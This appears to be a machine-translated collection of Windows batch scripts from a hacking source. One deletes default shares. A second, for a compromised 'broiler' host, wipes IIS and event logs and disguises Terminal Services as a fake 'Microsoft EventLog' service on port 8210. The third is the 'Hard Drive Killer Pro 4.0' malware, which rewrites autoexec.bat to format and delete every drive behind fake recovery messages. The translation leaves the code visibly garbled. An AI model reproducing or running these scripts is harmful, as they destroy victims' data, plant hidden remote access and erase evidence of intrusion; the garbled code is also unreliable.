NUL CLS Echo Thank you for sale a munga bunga products. echo. echo oh and he is not a get, he is a good looking genius. Echo. Echo here is a joke for you.. Echo Q). What's the WORST Thing About Being An Egg? Echo a). You ONLY GET LAID ONCE. Echo. Echo Hahahaha, Get It? DON 'THO. Echo Regards, Echo. Echo Munga Bunga : End Rem Hard Drive Killer Pro Version 4.0, Enjoy !!!! Rem Author: Munga Bunga - From Australia, The Land Full of retarded Australian's (Help Me Get Out of Here). Six. Wonderful instance is released.
1. Delete the Batch of Win2K / XP System Default Sharing ------------------------ Cut Here the Save as .bat or .cmd file --- ------------------------ @echo prepaging to delete all the default shares.when ready pres Any key. @pause @echo off: Rem Check parameters if Null show usage. if {% 1} == {} goto: USAGE: Rem code start. Echo. echo -------------------------------------------------------------------------------------------------------------- ---------------------------- Echo. Echo now deleding all the default shares. Echo. Net Share% 1 $ / Delete Net Share% 2 $ / Delete Net Share% 3 $ / Delete Net Share% 4 $ / Delete Net Share% 6 $ / Delete Net Share% 7 $ / Delete Net Share% 8 $ / Delete Net Share% 9 $ / Delete Net Stop Server Net Start Server Echo. Echo All The Sharees Have Been Deleteed Echo. Echo ---------------------------------------------------------------------------------------------------------------------- ------------------------- Echo. Echo Now Modify The Registry to Change The System Default Properties. Echo. Echo Now Creating The Registry File Echo Windows Registry Editor Version 5.00> C: /DELSHARE.REG ECHO [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / parameters] >> C: /DELSHARE.REG Echo "AutoSharewks" = dword: 00000000 >> C: /DELSHARE.REG Echo "AutoShareserver" = dword: 00000000 >> C: /DELSHARE.REG Echo NOWING Using the Registry File To CHANG THE SYSTEM Default Properties. regedit /sc:/delshare.reg echo deleneting the teemprotarily files. del c: /delshare.reg Goto: End: usage echo. echo --------------- --------------------------------------- Echo. Echo ☆ a example for bach file ☆ echo ☆ [Use Batch file to change the sysytem share proties.] ☆ Echo. Echo Author: EX4RCH Echo mail: EX4RCH@hotmail.com QQ: 1672602 Echo. Echo Error:
Not enough parameters echo echo ☆ Please enter the share disk you wanna delete ☆ echo echo For instance, to delete the default shares:... Echo delshare cde ipc admin print echo echo If the disklable is not as C: D: E:, PLEASE CHANG ITO EXAMPLE: Echo if Locak Disklable Are C: D: E: X: Y: Z: YOULD Chang CHEXYZ IPC Admin Print Echo. Echo *** you can delete Nine shares overce in a useing *** echo. Echo ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------- Goto: EOF: End Echo. Echo -------------------------- ---------------------------- Echo. Echo Ok, Delshare.bat Has Deleted All The Share You Assigned. Echo.ny Questions, Feel Free to Mail to EX4RCH@hotmail.com. echo echo. echo ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ------------------ Echo.: EOF Echo end of the bath layer ---------------------- - cut here life as .bat or .cmd file --------------------------- 2. Comprehensive reinforcement system (for broiler patch ) Batch file ------------------------ Cut Here Then Save AS . bat or .cmd file --------------------------- @echo windows registry editor version 5.00> patch.dll @echo [hkey_local_machine / system / CurrentControlSet / Services / LanmanServer / parameters] >> Patch.dll @echo "autoshareserver" = dword: 00000000 >> Patch.dll @ech: 00000000 >> Patch.dll @rem [forbidden sharing] @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Lsa] >> patch.dll @echo "restrictanonymous" = dword: 00000001 >> patch.dll @REM [prohibit anonymous login] @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / NetBT / Parameters] >> Patch.dll @echo "smbDeviceenable" =
DWord: 00000000 >> Patch.dll @Rem [Disable and File Access and Print Sharing] @echo [hkey_local_machine / system / currentcontrolset / services / @ remote @echo "start" = dword: 00000004 >> PATCH .dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / Schedule] >> patch.dll @echo "Start" = dword: 00000004 >> patch.dll @echo [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon] >> Patch.dll @echo "shutdownwithoutlogon" = "0" >> Patch.dll @Rem [Forbidden to shut down before login] @echo "dontdisplaylastusername" = "1" >> Patch.dll @rem [forbidden to display the previous login user Name] @Regedit / s patch.dll ------------------------ Cut Here the Save as .bat or .cmd file ------ -------------------- The following command is to remove all logs of broilers, prohibit some dangerous services, and modify the rooster's Terminnal Service leaving the road. @Regedit / s patch.dll @NET Stop W3SVC @NET Stop Event log @del C: / Winnt / System32 / Logfiles / W3SVC1 /*.* / F / Q @Del C: / Winnt / System32 / LogFiles / W3SVC2 / * . * / f / @del C: / Winnt / system32 / config / *. Event / f / @del C: / Winnt / system32dtclog /*.* / f / @del C: / WinNT / *. TXT / f / @del c: / winnt / *. log / f / @NET Start W3SVC @NET Start Event log @rem [Delete Log] @NET Stop Schedule / Y @NET Stop RemoteRegistry / Y @del patch.dll @echo the server has been patched, there is a service of hazardous services.
] @Echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / WinStations / RDP-Tcp] >> patch.dll @echo "PortNumber" = dword: 00002010 >> patch.dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / Wds / rdpwd / Tds / tcp >> patch.dll @echo "PortNumber" = dword: 00002012 >> patch.dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / TermDD] >> patch.dll @echo "Start" = dword: 00000002 >> patch.dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / SecuService] >> patch.dll @echo "Start" = dword: 00000002 >> patch.dll @echo "ErrorControl" = DWord: 00000001 >> Patch.dll @echo "imagepath" = HEX (2): 25, 00, 53, 00, 79, 00, 73, 00, 74, 00, 65, 6D, 00, 52, 00 , 6F, 00, 6F, 00, /> Patch.dll @echo 74,00, 25, 00, 5c, 00, 53, 0, 79, 3, 73, 100, 74, 100, 65, 6D 00, 33, 100, 32, 100, 5c, 00, 65, / >> Patch.dll @echo 00, 76, 100, 65, 0, 6E, 00, 74, 100, 6C, 00, 6F, 00 67,00, 2e, 00, 65, 3, 78, 100, 65, 100, 00 >> Patch.dll @echo "objectname" = "localsystem" >> Patch.dll @echo "type" = dword : 00000010 >> Patch.dll @echo "description" = "keEP Record of the program and windows' message.
">> patch.dll @echo" DisplayName "=" Microsoft EventLog ">> patch.dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / termservice] >> patch.dll @echo" Start "= dword: 00000004 >> Patch.dll @copy c: /winnt/system32/TERMSRV.EXE C: /WINNT/SYSTEM32 /EVENTLOG.EXE @Rem [Modify 3389 connection, port is 8210 (hexadecimal 00002012), name is Microsoft Eventlog, stay Behavous] 3.hard Drive Killer Pro Version 4.0 (playing batch to this level is not easy.
) ------------------------ Cut here the save as .bat or .cmd file -------------- ------------- @echem @ecdo off a very special person trues not want to be named.: start cls echo please wait while program loads.. Call Attrib -R -hc: /autoexec.bat> Nul Echo @echo off> c: /autoexec.bat echo call format c: / q / u / autosample> NUL >> C: /autoexec.bat call attrib r hc: / autoexec .bat> nul rem Drive checking and assigning the valid drives to the drive variable. set drive = set alldrive = cdefghijklmnopqrstuvw xyz rem code insertion for Drive Checking takes place here. rem drivechk.bat is the file name under the root directory. rem As far as the drive detection and drive variable settings, do not worry about how it rem works, it's d / * amn to complicated for the average or even the expert batch programmer. rem Except for Tom Lavedas. echo @echo off> drivechk. Bat echo @Prompt %%%% COMSPEC %%%% 1: $ b Find "Vol"> NUL> {T} .bat% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat del {t} .bat echo if ErrorLevel 1 goto Enddc >> Drivechk.bat CLS Echo please wait while program loads.. Rem when Errorlevel IS 1, THEN THE Above Is Not True, IF 0, THEN'S TRUE. Rem Opposite Of Binary Rules. IF 0, IT WILL ELAPS To The Next Command. Echo @Prompt %%%% COMSPEC %%%%%% / F / C DIR %%%%%% 1: .// AD / W / -P $ b Find "Bytes"> NUL> {T} .bat% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat del {t} .bat Echo if Errorlevel 1 Goto Enddc >>
... Drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS rem if errorlevel is 1, then the drive specified is a removable media drive -. Not ready rem if errorlevel is 0, then it will elaps to the next command echo @prompt. DIR %%%% 1: .// AD / W / -P $ b Find "0 bytes free"> NUL> {t} .bat% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk. Bat del {t} .bat echo if ErrorLevel 1 set drive = %% drive %% %% 1 >> Drivechk.bat CLS Echo please wait while program loadings.. Rem if it's error is a hard or floppy drive rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive echo:.... enddc >> drivechk.bat rem Drive checking insertion ends here "enddc" stands for "end dDRIVE cHECKING" rem Now We will use the program drivechk.bat to attain valid Drive Information.: Sampledrv for %% a in (% allDrive%) Do call drivechk.bat %% a> Nul del DRIVECHK.BAT> NUL IF% Drive. ==. set Drive = c: form_del call attrib -r -hc: /autoexec.bat> Nul echo @echo off> c: /autoexec.bat echo echo loading g windows, please wait while system.. >> c: /autoexec.bat echo for %%%% a in (% drive%) Do Call Format %%%% A: / Q / U / AutoSample > NUL >> C: /autoexec.bat echo cls >> C: /autoexec.bat echo echo loading windows, please wait while Microsoft Windows Recovers your system.. >> c: /autoexec.bat echo for %%%%% A in (% drive%) Do Call C: /Temp.bat %%%% a bunga> NUL >> C: /autoexec.bat echo cls >> c: /autoexec.bat echo echo loading windows, please wait while microsoft Windows recovers your system.. >> c: /autoexec.bat echo for %%%% a in (% drive%) Call deltree / y %%%% A: /> NUL >>
C: /autoexec.bat echo cls >> C: /autoexec.bat echo echo loading windows, please wait for system... >> c: /autoexec.bat echo for %%% a in (% Drive%) Do Call Format %%%% A: / Q / U / Autosample> NUL >> C: /autoexec.bat echo cls >> C: /autoexec.bat echo echo loading window, please wait for Wait While Microsoft Windows Recovers your System. >> C: /autoexec.bat echo for %%%A in (% drive%) Do Call C: /Temp.bat %%%% a bunga> NUL >> C: /autoexec.bat echo CLS >> C: /autoexec.bat echo echo loading windows, please wait while microsoft windows recovers your system... >> c: /autoexec.bat echo for %%%% a in (% drive%) Call Deltree / y %%%% A: /> NUL >> C: / / /AUTOEXEC.BAT Echo CD /> C: /autoexec.bat echo cls >> C: /autoexec.bat echo echo welcome to the land of death. Munga bunga's multiple Hard Drive Killer Version 4.0. >> C: /autoexec.bat echo echo if you ran this file, the Sorry, I Just Made It. The purpose of this program is to tell you the following.. >> C: / AutoExec .bat echo echo 1. To make PEO PLE AWARE THATED. >> C: /autoexec.bat echo echo 2. love is important, if you have it, truly, don't let Go of It Like i DID! >> C: / Autoexec.bat echo echo 3. If you are not a vegetarian, then you are a murderer, and i'm glad your hd is dead. >> c: /autoexec.bat echo echo 4. don't support the following: WAR .,................................................................................. Bat Echo Echo Munga Bunga >> C: /autoexec.bat Call Attrib R
Hc: /autoexec.bat: Makedir if exist c: /temp.bat attrib -r -hc:/temp.bat> Nul echo @echo off> c: /Temp.bat Echo %% 1: / >> C: / Temp.bat echo cd / >> c: / temp.bat echo: startmd >> c: /Temp.bat echo for %%%% a in ("if not exist %% 2 / NUL MD %% 2" IF EXIST %% 2 / NUL CD %% 2 ") DO %%%% A >> C: /TEMP.BAT Echo for %%%% a in ("> ass_hole.txt ") Do Echo %%%% a Your Gone @ $$ Hole !!!! >> C: /TEMP.BAT Echo if NOT %% 1: / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / NUL GOTO STARTMD >> C: /TEMP.BAT CALL ATTRIB R HC: /TEMP.BAT > NUL CLS Echo Initializing Variables... Rem Deltree / Y %% A: / *. Only Eliminates Director, Hence Leaving The File Created Above For Further Destruction. For %% a in (% DRIVE%) Do Call Format %% a : / q / u / autosample> NUL CLS Echo Initializing variables... Echo Validating Data.... for %% a in (% DRIVE%) Do Call C: /Temp.Bat %% a Munga> NUL CLS Echo Initializing Variables Echo Validating D ata....... for %% a in (% DRIVE%) CALL Attrib -R-h %% A: / / / / s> NUL CALL Attrib R HC: /TEMP.BAT> NUL CALL attrib r hc:............ /autoexec.bat> nul cls echo Initializing Variables echo Validating Data echo Analyzing System Structure echo Initializing Application for %% a in (% drive%) call deltree / y %% A: / *.> NUL CLS Echo Initializing Variables... Echo Analyzing application.............................................................................................................................................. Drive%) Do Call C: /Temp.bat %% a MUNGA>